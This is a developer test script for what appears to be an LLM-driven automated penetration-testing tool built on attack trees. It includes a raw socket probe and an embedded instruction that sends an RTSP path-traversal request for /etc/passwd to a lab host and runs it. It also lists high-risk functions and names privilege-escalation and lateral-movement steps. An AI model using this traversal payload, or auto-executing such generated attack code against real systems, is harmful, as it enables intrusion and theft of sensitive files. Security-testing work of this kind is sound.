You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 

166 lines
5.4 KiB

import re
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
from mycode.DBManager import app_DBM
import textwrap
class Mytest:
def update_node_inter(self,attack_index):
attack_tree = g_PKM.ReadData(attack_index)
nodes = attack_tree.traverse_dfs()
# 06-0=>p
instr = nodes[6].get_instr_user().pop(0)
nodes[6].parent.get_instr_user().append(instr)
# 39-1
instr = nodes[39].get_instr_user().pop(1)
nodes[39].parent.get_instr_user().append(instr)
# 49-0
instr = nodes[49].get_instr_user().pop(0)
nodes[49].parent.get_instr_user().append(instr)
g_PKM.WriteData(attack_tree, attack_index)
def dynamic_fun(self):
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 增加超时时间
s.connect(("192.168.3.105", 52989))
# 基于返回的 "99 -1 45973" 字符串构造特殊payload
special_cmd = b'99\\x01\\x00\\x00\\x00' # 模拟协议头
s.sendall(special_cmd)
response = s.recv(2048)
s.close()
return (True, f"SpecialCmd Response: {response.hex()}")
except Exception as e:
return (False, str(e))
def do_test(self):
pass
def tmp_test(self):
list_a = [0,1,2,3,4,5,6,7,8,9]
isart = len(list_a) - 4 # 正常应该都是两个两个
if isart % 2 != 0:
print("c_msg数量不对称,需要检查逻辑!")
for msg in list_a[isart:]:
print(msg)
if __name__ == "__main__":
# 示例使用
mytest = Mytest()
LLM = LLMManager(1)
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 49
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
if test_type == 0:
mytest.dynamic_fun()
elif test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
instruction = '''python-code
def dynamic_fun():
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 设置超时时间为20秒
s.connect(("192.168.3.105", 11200))
# 发送畸形RTSP请求探测边界条件
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
s.send(payload.encode())
response = s.recv(4096).decode()
s.close()
if "404" in response:
return (False, "存在输入过滤机制")
elif "root:" in response:
return (True, "成功读取敏感文件")
else:
return (False, f"未知响应:{response}")
except Exception as e:
return (False, f"连接异常:{str(e)}")
'''
task_Object.PythonM.start_pool() #开个子进程池就行
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
# 暂存结果
oneres = {'执行指令': instr, '结果': reslut}
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
node_path = "目标系统->192.168.3.105->52989端口"
instr_id = 3233
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
cur_node = None
for node in nodes:
if node.path == node_path:
cur_node = node
break
if cur_node:
str_instr = app_DBM.get_one_instr(instr_id)
if "import" in str_instr:
str_instr = "python-code " + str_instr
cur_node.test_add_instr(str_instr)
cur_node.update_work_status(1)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
else:
print("没找到节点!")
elif test_type ==3: #测试指令入节点
strinstr = '''
'''
strNodes = "执行系统命令探测,权限提升尝试,横向移动测试"
nodes = strNodes.split(', ')
unique_names = list(set(nodes)) # 去重
for node_name in unique_names:
print(node_name)
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("27")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
testnode = TreeNode("test", 0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.parent_messages[0]["content"]
# print(systems)
# 遍历node,查看有instr的ndoe
nodes = attact_tree.traverse_bfs()
for node in nodes:
node.parent_messages[0]["content"] = systems
g_PKM.WriteData(attact_tree, "27")
print("完成Messgae更新")
elif test_type ==5:
mytest.dynamic_fun()
elif test_type == 6:
mytest.tmp_test()
else:
pass